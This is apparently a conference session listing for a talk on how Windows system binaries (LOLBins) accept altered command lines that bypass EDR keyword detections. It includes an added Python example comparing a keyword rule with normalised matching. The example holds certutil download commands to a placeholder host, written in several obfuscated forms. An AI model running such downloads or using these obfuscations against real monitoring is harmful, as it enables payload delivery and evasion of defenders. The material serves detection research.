Thursday February 6, 2025 10:00am - 10:50am MST
Most Endpoint Detection & Response solutions (‘EDRs’) rely heavily on analysing process events to detect suspicious behaviour; in particular, command-line arguments are inspected for keywords or character sequences that may indicate malicious activity. This is still common practice, despite the widely known fact that a process’ command line can be altered, hidden or otherwise spoofed, which may bypass such defensive measures.

Less well known is that, particularly on Windows, there is a wealth of system-native programs that happily accept ‘unexpected’ command-line transformations, such as character substitutions, deletions or insertions. An implication of this is that command-line-based detections can be bypassed with minimal effort and, unlike command-line spoofing, without the need for special system calls. Tools vulnerable to this include those often leveraged in attacks that ‘live off the land’ (also known as LOLBins or LOLBAS).

This talk will show, based on an empirical analysis of the 60 most commonly used LOLBins, how many detections can be bypassed by making minimal tweaks to how a LOLBin is called. Furthermore, we will introduce a new web-based tool that not only documents the results for all of these executables, but also lets anyone generate obfuscated command lines themselves with the click of a button.
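To make the gap between a keyword rule and a parser-tolerant binary concrete, here is an added example in Python; it is not code from the talk or from its web tool. It evaluates a constructed keyword rule against constructed command lines that apply the transformation classes the abstract names (option-character substitution, case substitution and quote insertion), first on the raw command line as an EDR would record it and then after a normalisation step that undoes those specific transformations. The rule, the sample command lines and the assumption that the target binary tolerates each transformation are part of the example, not results from the talk.

```python
"""Keyword-based command-line detection versus argument transformations.

Added example, not from the talk. All samples below are constructed; whether
a given real binary accepts a given transformation is an assumption here.
"""
import re

# Constructed rule: every keyword must occur in the command line. Anchoring on
# the option character ("-urlcache") is a common way to reduce false positives,
# and it is exactly what option-character substitution exploits.
RULE = ("certutil", "-urlcache")

# Constructed samples. "canonical" is the form a rule author expects; the next
# three apply one transformation each; "benign" should never match.
SAMPLES = {
    "canonical":       'certutil.exe -urlcache -split -f http://example.invalid/a.exe a.exe',
    "option_char_sub": 'certutil.exe /urlcache /split /f http://example.invalid/a.exe a.exe',
    "case_sub":        'CeRtUtIl.exe -UrLcAcHe -split -f http://example.invalid/a.exe a.exe',
    "quote_insertion": 'cert"util".exe -url"cache" -split -f http://example.invalid/a.exe a.exe',
    "benign":          'certutil.exe -hashfile C:\\Windows\\notepad.exe SHA256',
}


def naive_match(rule, cmdline):
    """Case-insensitive substring match on the raw command line string."""
    s = cmdline.lower()
    return all(keyword in s for keyword in rule)


def normalize(cmdline):
    """Undo the transformations this example assumes the binary tolerates.

    - lower-case everything (case-insensitive option names)
    - drop double quotes (assumed removed by the target's argv parsing)
    - rewrite a token-leading '/' as '-' (option-character substitution);
      slashes inside URLs or paths are not token-leading and are left alone
    - collapse runs of whitespace
    """
    s = cmdline.lower()
    s = s.replace('"', '')
    s = re.sub(r'(^|\s)/', r'\1-', s)
    s = re.sub(r'\s+', ' ', s).strip()
    return s


def normalized_match(rule, cmdline):
    """Apply the same rule after normalisation."""
    return naive_match(rule, normalize(cmdline))


def evaluate(rule, samples):
    """Return {sample_name: (matched_raw, matched_after_normalisation)}."""
    return {
        name: (naive_match(rule, cmdline), normalized_match(rule, cmdline))
        for name, cmdline in samples.items()
    }


if __name__ == "__main__":
    for name, (raw, norm) in evaluate(RULE, SAMPLES).items():
        print(f"{name:16} raw={str(raw):5} normalized={norm}")
```

Normalisation only recovers the transformations it was written to undo; each binary's tolerance is different and can only be established empirically, per executable, which is the gap the talk's results and tool address. It also widens the rule's reach, so a normalisation layer needs its own false-positive review before it goes into production.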
Speakers
Wietze Beukema

Wietze has been hacking around with computers for years. Originally from the Netherlands, he currently works as a Senior Threat Detection & Response Engineer in London. As a cyber security enthusiast and threat researcher, he has presented his findings on topics including attacker...
Colorado Ballroom